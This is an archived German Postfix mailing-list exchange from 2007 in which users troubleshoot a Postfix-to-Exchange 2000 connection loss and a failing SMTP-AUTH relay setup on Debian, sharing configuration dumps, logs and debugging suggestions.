Message-ID: <47501D1B.7080903@solnet.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hallo Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? Fehler: Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: to=, relay=mail.xxxx.xx[1.1.1.1.]:25, delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL FROM) In der FAQ steht, dass solche Probleme mit einer PIX oder mit einer falschen MTU zu tun haben koennte. Ich habe deshalb die MTU Size auf 1468 gesetzt zum Testen. Hat aber nichts bewirkt. Ich hab keinen Zugriff auf den Remote Server (Exchange) Das Problem taucht nur mit Postfix auf. Benutzt man Sendmail zum Senden klappt es. Der Server auf der Gegenstelle (Exchange) hat keinen load und Antwortet schnell. Postfix laeuft ansonsten ohne Probleme nur mit diesem einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails senden kann, kann es weniger am Server selber liegen. Meine Einstellungen: postfix-2.4.5 postconf -n (IP informationen habe ich entfernt) address_verify_sender = <> alias_database = hash:/etc/mail/aliases alias_maps = hash:/etc/mail/aliases body_checks = pcre:/usr/local/etc/postfix/body_checks bounce_queue_lifetime = 2 bounce_template_file = /usr/local/etc/postfix/bounce-templates/bounce.de.cf broken_sasl_auth_clients = yes command_directory = /usr/local/sbin config_directory = /usr/local/etc/postfix content_filter = lmtp-amavis:[127.0.0.1]:10024 daemon_directory = /usr/local/libexec/postfix debug_peer_level = 3 default_process_limit = 500 delay_warning_time = 24h disable_vrfy_command = yes header_checks = regexp:/usr/local/etc/postfix/header_checks html_directory = no lmtp_destination_concurrency_limit = 5 lmtp_sasl_auth_enable = yes lmtp_sasl_password_maps = hash:/usr/local/etc/postfix/lmtp_password_map lmtp_sasl_security_options = noanonymous lmtp_tcp_port = 2003 local_recipient_maps = ldap:ldaplocalrecipients mail_owner = postfix mailq_path = /usr/local/bin/mailq manpage_directory = /usr/local/man maps_rbl_reject_code = 550 maximal_queue_lifetime = 5d message_size_limit = 20480000 mydestination = mail.yyyy.yy myorigin = $mydomain newaliases_path = /usr/local/bin/newaliases queue_directory = /var/spool/postfix readme_directory = no sample_directory = /usr/local/etc/postfix sendmail_path = /usr/local/sbin/sendmail setgid_group = maildrop smtp_tls_note_starttls_offer = yes smtpd_banner = $myhostname smtpd_client_restrictions = permit_sasl_authenticated smtpd_etrn_restrictions = reject smtpd_helo_required = yes smtpd_helo_restrictions = permit_mynetworks reject_invalid_hostname smtpd_recipient_limit = 104 smtpd_recipient_restrictions = reject_unlisted_recipient check_recipient_access hash:/usr/local/etc/postfix/access permit_mynetworks permit_sasl_authenticated reject_inv alid_hostname reject_non_fqdn_hostname reject_non_fqdn_recipient reject_non_fqdn_sender reject_unknown_sender_domain reject_unknown_recipient_domain reje ct_unknown_recipient_domain reject_rbl_client dul.dnsbl.sorbs.net reject_rbl_client smtp.dnsbl.sorbs.net check_client_access pcre:/usr/local/etc/postfix/dynamic.pcre che ck_client_access pcre:/usr/local/etc/postfix/dynamic_ranges.pcre check_helo_access pcre:/usr/local/etc/postfix/helo_checks permit_mx_backup reject smtpd_reject_unlisted_sender = yes smtpd_restriction_classes = greylisting smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sasl_security_options = noanonymous smtpd_sasl_tls_security_options = $smtpd_sasl_security_options smtpd_sender_restrictions = reject_unknown_sender_domain check_sender_access hash:/usr/local/etc/postfix/access permit soft_bounce = no tls_random_source = dev:/dev/urandom transport_maps = hash:/usr/local/etc/postfix/transport unknown_address_reject_code = 550 unknown_local_recipient_reject_code = 550 virtual_alias_domains = hash:/usr/local/etc/postfix/maildomains virtual_alias_maps = ldap:xxx Gruss Tom -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHUB0bGCwkYTI5tyARAo0uAJ42eAfp595SPUH758ChXdC94S4+OwCgl3cF plqT1Sx5UEHiGcxQS4Ct/qI= =gTF2 -----END PGP SIGNATURE----- From driessen at fblan.de Fri Nov 30 15:30:43 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 30 Nov 2007 15:30:43 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130141958.GM12941@mail.incertum.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> Message-ID: <000b01c8335d$972923d0$0565a8c0@uwe> Stefan Förster schrieb: > * pinguin at tuxolino.net wrote: > > to=, relay=mail.tuxolino.net[89.246.255.36]:25, > > delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host > > mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... > > Relaying denied. Proper authentication required. (in reply to RCPT TO > > command)) > > Dein Postfix versucht anscheinend nichtmal, eine Authentifizierung > vorzunehmen. > > > relayhost = [mail.tuxolino.net] > > smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd > > Steht in /etc/postfix/sasl_passwd der Hostname genauso drin wie in > "relayhost", also mit eckigen Klammern? > > Buest guess: "postconf -e debug_peer_list=mail.tuxolino.net" ausführen, > "postfix reload" hinterherschicken, Mail nochmal absenden und im > Debug-Output schaun, warum er kein AUTH machen mag. Ich wette 2 Cent > auf fehlende sasl2-modules, scheint ja Debian zu sein, oder? Und ich wette 2 cent das in Outlook kein auth für das versenden eingetragen ist Was hast du nur gegen Debian *gg > > > Ciao > Stefan Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From Ralf.Hildebrandt at charite.de Fri Nov 30 15:34:47 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Fri, 30 Nov 2007 15:34:47 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <47501D1B.7080903@solnet.ch> References: <47501D1B.7080903@solnet.ch> Message-ID: <20071130143447.GL32622@charite.de> * Thomas Vogt : > Hallo > > Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? Nö. > Fehler: > Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: > to=, relay=mail.xxxx.xx[1.1.1.1.]:25, > delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred > (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL > FROM) Was loggt der Exchange? > einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails > senden kann, kann es weniger am Server selber liegen. Das denkst Du. Exchange 2000 hat soviele spektakuläre Fehler. http://www.arschkrebs.de/postfix/broken_microsoft.shtml wäre einen Versuch wert, auch mal ein TCPDUMP der Sitzung. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Al Gore invented the Internet, Bill Gates deployed it. That's their respective stories, anyways From pinguin at tuxolino.net Fri Nov 30 15:35:16 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 15:35:16 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <000a01c8335b$c953c510$0565a8c0@uwe> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <000a01c8335b$c953c510$0565a8c0@uwe> Message-ID: <33078.87.122.137.152.1196433316.squirrel@www.tuxolino.net> >> Meine /var/log/mail.log: >> tail /var/log/mail.log >> Nov 30 14:40:45 localhost postfix/pickup[3159]: DE6FE2B6CB: uid=1000 >> from= >> Nov 30 14:40:45 localhost postfix/cleanup[4020]: DE6FE2B6CB: >> message-id=<20071130134045.GA4012 at tuxolino.net> >> Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: >> from=, size=428, nrcpt=1 (queue active) >> Nov 30 14:40:46 localhost postfix/smtp[4022]: DE6FE2B6CB: >> to=, relay=mail.tuxolino.net[89.246.255.36]:25, >> delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host >> mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... >> Relaying denied. Proper authentication required. (in reply to RCPT TO >> command)) > > Und wo ist das auth ? wo wird das abgelehnt? Das ist eine Anzeige die ich bekommen, wenn ich von der GUI mit KMail versuche Mails zu versenden oder abzuholen. > > Mal ein Schuß ins Blaue dein Outlook meldet sich gar nicht erst an bzw. > versucht sich > überhaupt nicht anzumelden (keine Übermittlung von User und PW). Kann ich weder ausschliessen noch bestaetigen, wie stelle ich das sicher fest? > >> Nov 30 14:40:46 localhost postfix/cleanup[4020]: 572AC2B6CC: >> message-id=<20071130134046.572AC2B6CC at localhost> >> Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: from=<>, >> size=2289, nrcpt=1 (queue active) >> Nov 30 14:40:46 localhost postfix/bounce[4023]: DE6FE2B6CB: sender >> non-delivery notification: 572AC2B6CC >> Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: removed >> Nov 30 14:40:46 localhost postfix/local[4024]: 572AC2B6CC: >> to=, relay=local, delay=0.09, >> delays=0.01/0.03/0/0.05, dsn=2.0.0, status=sent (delivered to command: >> procmail -a "$EXTENSION") >> Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: removed >> Meine /etc/postfix/main.cf sieht wie folgt aus: smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) biff = no append_dot_mydomain = no smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=no smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtpd_sasl_auth_enable=yes smtpd_sasl_security_options=noanonymous smtpd_tls_auth_only=no smtpd_sasl_local_domain=test-tux broken_sasl_auth_clients=yes myhostname = localhost alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases myorigin = /etc/mailname mydestination = tuxolino.net, localhost, localhost.localdomain, localhost relayhost = [mail.tuxolino.net] mynetworks = 127.0.0.0/8 mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all smtp_sasl_auth_enable=yes smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd smtp_sasl_security_options=noanonymous smtp_tls_security_level=none > Nein der fragte dich nach der Ausgabe von postconf -n Ok, danke, das war aus der Erinnerung erstellt. Die Ausgabe von postconf -n ergibt: alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix inet_interfaces = all mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 mydestination = tuxolino.net, localhost, localhost.localdomain, localhost myhostname = localhost mynetworks = 127.0.0.0/8 myorigin = /etc/mailname recipient_delimiter = + relayhost = [mail.tuxolino.net] smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_tls_security_level = none smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = test-tux smtpd_sasl_security_options = noanonymous smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache smtpd_use_tls = no > Und bitte auch noch die master.cf OHNE KOMENTARE Entschuldigung! Ja, ohne Kommentare: smtp inet n - - - - smtpd pickup fifo n - - 60 1 pickup cleanup unix n - - - 0 cleanup qmgr fifo n - n 300 1 qmgr #qmgr fifo n - - 300 1 oqmgr tlsmgr unix - - - 1000? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000? 0 flush proxymap unix - - n - - proxymap smtp unix - - - - - smtp relay unix - - - - - smtp -o fallback_relay= showq unix n - - - - showq error unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache maildrop unix - n n - - pipe flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient} uucp unix - n n - - pipe flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient) ifmail unix - n n - - pipe flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient) bsmtp unix - n n - - pipe flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient scalemail-backend unix - n n - 2 pipe flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension} mailman unix - n n - - pipe flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${user} > > Wenn du kein TLS benutzt dann wirf es erstmal raus die Kiste sollte > erstmal Ohne TLS Ich denke, dass ich das mit dem Eintrag 'smtp_tls_security_level=none' in der /etc/postfix/main.cf gemacht habe, oder verstehe ich das falsch? > sauber rennen sonst hast du noch mehr Baustellen Da es nicht laeuft habe ich wohl noch, mir unbekannte Bausellen. Gruss, Michael From mhaegele at linuxrocks.dyndns.org Fri Nov 30 15:40:14 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 15:40:14 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <47501D1B.7080903@solnet.ch> References: <47501D1B.7080903@solnet.ch> Message-ID: <475020CE.4090209@linuxrocks.dyndns.org> Thomas Vogt schrieb: > Hallo > > Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? Gegenfrage: Gibt es irgendwas das keine Probleme mit Exchange hat? > Fehler: > Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: > to=, relay=mail.xxxx.xx[1.1.1.1.]:25, > delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred > (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL > FROM) > > In der FAQ steht, dass solche Probleme mit einer PIX oder mit einer > falschen MTU zu tun haben koennte. Ich habe deshalb die MTU Size auf > 1468 gesetzt zum Testen. Hat aber nichts bewirkt. Ich hab keinen > Zugriff auf den Remote Server (Exchange) > > Das Problem taucht nur mit Postfix auf. Benutzt man Sendmail zum Senden > klappt es. Der Server auf der Gegenstelle (Exchange) hat keinen load und > Antwortet schnell. Postfix laeuft ansonsten ohne Probleme nur mit diesem > einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails > senden kann, kann es weniger am Server selber liegen. > > Meine Einstellungen: > postfix-2.4.5 > > postconf -n (IP informationen habe ich entfernt) > address_verify_sender = <> > alias_database = hash:/etc/mail/aliases > alias_maps = hash:/etc/mail/aliases > body_checks = pcre:/usr/local/etc/postfix/body_checks > bounce_queue_lifetime = 2 > bounce_template_file = /usr/local/etc/postfix/bounce-templates/bounce.de.cf > broken_sasl_auth_clients = yes > command_directory = /usr/local/sbin > config_directory = /usr/local/etc/postfix > content_filter = lmtp-amavis:[127.0.0.1]:10024 > daemon_directory = /usr/local/libexec/postfix > debug_peer_level = 3 > default_process_limit = 500 > delay_warning_time = 24h > disable_vrfy_command = yes > header_checks = regexp:/usr/local/etc/postfix/header_checks > html_directory = no > lmtp_destination_concurrency_limit = 5 > lmtp_sasl_auth_enable = yes > lmtp_sasl_password_maps = hash:/usr/local/etc/postfix/lmtp_password_map > lmtp_sasl_security_options = noanonymous > lmtp_tcp_port = 2003 > local_recipient_maps = ldap:ldaplocalrecipients > mail_owner = postfix > mailq_path = /usr/local/bin/mailq > manpage_directory = /usr/local/man > maps_rbl_reject_code = 550 > maximal_queue_lifetime = 5d > message_size_limit = 20480000 > mydestination = mail.yyyy.yy > myorigin = $mydomain > newaliases_path = /usr/local/bin/newaliases > queue_directory = /var/spool/postfix > readme_directory = no > sample_directory = /usr/local/etc/postfix > sendmail_path = /usr/local/sbin/sendmail > setgid_group = maildrop > smtp_tls_note_starttls_offer = yes > smtpd_banner = $myhostname > smtpd_client_restrictions = permit_sasl_authenticated > smtpd_etrn_restrictions = reject > smtpd_helo_required = yes > smtpd_helo_restrictions = permit_mynetworks reject_invalid_hostname > smtpd_recipient_limit = 104 > smtpd_recipient_restrictions = reject_unlisted_recipient > check_recipient_access hash:/usr/local/etc/postfix/access > permit_mynetworks permit_sasl_authenticated reject_inv > alid_hostname reject_non_fqdn_hostname > reject_non_fqdn_recipient reject_non_fqdn_sender > reject_unknown_sender_domain reject_unknown_recipient_domain > reje > ct_unknown_recipient_domain reject_rbl_client dul.dnsbl.sorbs.net > reject_rbl_client smtp.dnsbl.sorbs.net check_client_access > pcre:/usr/local/etc/postfix/dynamic.pcre che > ck_client_access pcre:/usr/local/etc/postfix/dynamic_ranges.pcre > check_helo_access pcre:/usr/local/etc/postfix/helo_checks > permit_mx_backup reject > smtpd_reject_unlisted_sender = yes > smtpd_restriction_classes = greylisting > smtpd_sasl_auth_enable = yes > smtpd_sasl_local_domain = > smtpd_sasl_security_options = noanonymous > smtpd_sasl_tls_security_options = $smtpd_sasl_security_options > smtpd_sender_restrictions = reject_unknown_sender_domain > check_sender_access hash:/usr/local/etc/postfix/access permit > soft_bounce = no > tls_random_source = dev:/dev/urandom > transport_maps = hash:/usr/local/etc/postfix/transport > unknown_address_reject_code = 550 > unknown_local_recipient_reject_code = 550 > virtual_alias_domains = hash:/usr/local/etc/postfix/maildomains > virtual_alias_maps = ldap:xxx > > > Gruss > Tom Hast du mal eine Mail händisch mittels telnet z.B. auf dem "gegnerischen Server" erfolgreich abgesetzt, vielleicht kann dir der "andere Administrator" beim Debuggen weiterhelfen (hmm es ist Exchange ...) -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From cite at incertum.net Fri Nov 30 15:42:44 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 15:42:44 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <000b01c8335d$972923d0$0565a8c0@uwe> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> <000b01c8335d$972923d0$0565a8c0@uwe> Message-ID: <20071130144244.GN12941@mail.incertum.net> * Uwe Driessen wrote: > Was hast du nur gegen Debian *gg Gar nichts. Aber das Paket wird gerne vergessen, wenn man mit dem smtp-Client von Postfix SASL-Auth machen will. Wird der entfernte Host dann in die debug_peer_list aufgenommen, meckert er, daß er keine benutzbaren Mechanismen findet. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #195: SOAP - "Verbotene Liebe" ala Microsoft (Bernd Dutkwoski) From driessen at fblan.de Fri Nov 30 15:46:48 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 30 Nov 2007 15:46:48 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <47501D1B.7080903@solnet.ch> References: <47501D1B.7080903@solnet.ch> Message-ID: <000c01c8335f$d661ea30$0565a8c0@uwe> > -----Original Message----- > From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users- > bounces at listi.jpberlin.de] On Behalf Of Thomas Vogt > Sent: Friday, November 30, 2007 3:24 PM > To: postfixbuch-users at listi.jpberlin.de > Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection > with "while sending MAIL FROM) > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hallo > > Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? > Nee eher Probleme mit Eeeeeeexchange http://www.arschkrebs.de/postfix/exchange_sucks3.shtml *ggg > Fehler: > Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: > to=, relay=mail.xxxx.xx[1.1.1.1.]:25, > delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred > (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL > FROM) > > In der FAQ steht, dass solche Probleme mit einer PIX oder mit einer > falschen MTU zu tun haben koennte. Ich habe deshalb die MTU Size auf > 1468 gesetzt zum Testen. Hat aber nichts bewirkt. Ich hab keinen > Zugriff auf den Remote Server (Exchange) > > Das Problem taucht nur mit Postfix auf. Benutzt man Sendmail zum Senden > klappt es. Der Server auf der Gegenstelle (Exchange) hat keinen load und > Antwortet schnell. Postfix laeuft ansonsten ohne Probleme nur mit diesem > einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails > senden kann, kann es weniger am Server selber liegen. Stell das Timeout mal höher ein sowohl auf dem Exchange als auch auf dem Postfix Main.cf smtpd_discard_ehlo_keywords = hash:/etc/postfix/smtpd_discard_ehlo_keyword smtpd_discard_ehlo_keyword : exchangeserver IP esmtp, pipelining wobei ich nicht sagen kann das es daran liegt und ob es dann funktioniert da können die alten Hasen mehr dazu sagen Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mhaegele at linuxrocks.dyndns.org Fri Nov 30 15:49:28 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 15:49:28 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <20071130143447.GL32622@charite.de> References: <47501D1B.7080903@solnet.ch> <20071130143447.GL32622@charite.de> Message-ID: <475022F8.8030807@linuxrocks.dyndns.org> Ralf Hildebrandt schrieb: > * Thomas Vogt : >> Hallo >> >> Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? > > Nö. > >> Fehler: >> Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: >> to=, relay=mail.xxxx.xx[1.1.1.1.]:25, >> delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred >> (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL >> FROM) > > Was loggt der Exchange? > >> einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails >> senden kann, kann es weniger am Server selber liegen. > > Das denkst Du. Exchange 2000 hat soviele spektakuläre Fehler. > > http://www.arschkrebs.de/postfix/broken_microsoft.shtml > wäre einen Versuch wert, auch mal ein TCPDUMP der Sitzung. Trifft das "nur" auf Exchange 2000 zu oder haben neuere Exchange Versionen immer noch diese Probleme?. Schon komisch dass immer alle um die "Microsoftsche Bananensoftware" herumpatchen müssen ... > -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From pinguin at tuxolino.net Fri Nov 30 15:49:23 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 15:49:23 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130141958.GM12941@mail.incertum.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> Message-ID: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> > Dein Postfix versucht anscheinend nichtmal, eine Authentifizierung > vorzunehmen. > >> relayhost = [mail.tuxolino.net] >> smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd > > Steht in /etc/postfix/sasl_passwd der Hostname genauso drin wie in > "relayhost", also mit eckigen Klammern? Nein, die eckigen Klammern hatte ich in der sasl_passwd nicht stehen, das habe ich jetzt geaendert. > > Buest guess: "postconf -e debug_peer_list=mail.tuxolino.net" ausführen, > "postfix reload" hinterherschicken, Mail nochmal absenden und im > Debug-Output schaun, warum er kein AUTH machen mag. Habe ich ausgefuehrt. Das Ergebnis ist: tail /var/log/mail.log Nov 30 15:41:38 localhost postfix/smtp[4162]: > mail.tuxolino.net[89.246.255.36]: QUIT Nov 30 15:41:38 localhost postfix/smtp[4162]: < mail.tuxolino.net[89.246.255.36]: 250 2.0.0 Reset state Nov 30 15:41:38 localhost postfix/smtp[4162]: name_mask: resource Nov 30 15:41:38 localhost postfix/smtp[4162]: name_mask: software Nov 30 15:41:38 localhost postfix/cleanup[4160]: 607FC2B6CC: message-id=<20071130144138.607FC2B6CC at localhost> Nov 30 15:41:38 localhost postfix/qmgr[4133]: 607FC2B6CC: from=<>, size=2289, nrcpt=1 (queue active) Nov 30 15:41:38 localhost postfix/bounce[4163]: 525102B6CB: sender non-delivery notification: 607FC2B6CC Nov 30 15:41:38 localhost postfix/qmgr[4133]: 525102B6CB: removed Nov 30 15:41:38 localhost postfix/local[4164]: 607FC2B6CC: to=, relay=local, delay=0.05, delays=0.01/0.02/0/0.02, dsn=2.0.0, status=sent (delivered to command: procmail -a "$EXTENSION") Nov 30 15:41:38 localhost postfix/qmgr[4133]: 607FC2B6CC: removed Lokal scheint es weitergegangen zu sein, aber am Ziel angekommen ist die Mail leider nicht. Ich wette 2 Cent > auf fehlende sasl2-modules Sollst Du bekommen, wenn es stimmt! ;) , scheint ja Debian zu sein, oder? Das ist ein Volltreffer! ;) Es ist etch. Gruss, Michael From pinguin at tuxolino.net Fri Nov 30 15:53:57 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 15:53:57 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130142714.74600@gmx.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130142714.74600@gmx.net> Message-ID: <50896.87.122.137.152.1196434437.squirrel@www.tuxolino.net> >> relayhost = [mail.tuxolino.net] > ^^^^^^^^^^^^^^^^^ > > Wenn ichs richtig verstanden habe hast du nen eigenen nicht öffentlichen > Mailserver der zu versatel relayen soll, also sollte da der smtp von > Versatel stehen und nicht dein Server... Ich habe auf meinem lokalen Rechner ein postfix laufen. Die tuxolino.net Domain ist meine und wird bei Versatel gehostet. Gruss, Michael From pinguin at tuxolino.net Fri Nov 30 15:55:45 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 15:55:45 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <000b01c8335d$972923d0$0565a8c0@uwe> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> <000b01c8335d$972923d0$0565a8c0@uwe> Message-ID: <50899.87.122.137.152.1196434545.squirrel@www.tuxolino.net> > Und ich wette 2 cent das in Outlook kein auth für das versenden > eingetragen ist Die hast Du verloren ;). Ich nutze mutt und KMail ;) Gruss, Michael From pinguin at tuxolino.net Fri Nov 30 15:58:53 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 15:58:53 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130144244.GN12941@mail.incertum.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> <000b01c8335d$972923d0$0565a8c0@uwe> <20071130144244.GN12941@mail.incertum.net> Message-ID: <48981.87.122.137.152.1196434733.squirrel@www.tuxolino.net> >> Was hast du nur gegen Debian *gg > > Gar nichts. Aber das Paket wird gerne vergessen, wenn man mit dem > smtp-Client von Postfix SASL-Auth machen will. Wird der entfernte Host > dann in die debug_peer_list aufgenommen, meckert er, daß er keine > benutzbaren Mechanismen findet. Fuer sasl2 habe ich folgende Pakete installiert: 'libsasl2-2 libsasl2-modules sasl2-bin' Gruss, Michael From driessen at fblan.de Fri Nov 30 15:59:00 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 30 Nov 2007 15:59:00 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net><20071130141958.GM12941@mail.incertum.net> <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> Message-ID: <000d01c83361$8a93b780$0565a8c0@uwe> pinguin at tuxolino.net schrieb: > > > > Buest guess: "postconf -e debug_peer_list=mail.tuxolino.net" ausführen, > > "postfix reload" hinterherschicken, Mail nochmal absenden und im > > Debug-Output schaun, warum er kein AUTH machen mag. > Habe ich ausgefuehrt. Das Ergebnis ist: Also ich vermisse solche Zeilen oder ähnliche im Log Nov 30 15:46:56 s1 postfix/smtpd[1000]: connect from unknown[193.158.37.xxx] Nov 30 15:46:56 s1 postfix/smtpd[1000]: setting up TLS connection from unknown[193.158.37.xxx] Nov 30 15:46:56 s1 postfix/smtpd[1000]: TLS connection established from unknown[193.158.37.226]: TLSv1 with cipher RC4-MD5 (128/128 bits) Nov 30 15:46:56 s1 postfix/smtpd[1000]: 40C0482C2F1: client=unknown[193.158.37.xxx], sasl_method=LOGIN, sasl_username=halligalli at fblan.de Nov 30 15:46:56 s1 postfix/cleanup[1003]: 40C0482C2F1: message-id=<000c01c8335f$d661ea30$0565a8c0 at meiner> Nov 30 15:46:56 s1 postfix/qmgr[4589]: 40C0482C2F1: from=, size=3158, nrcpt=1 (queue active) Nov 30 15:46:58 s1 postfix/smtpd[1000]: disconnect from 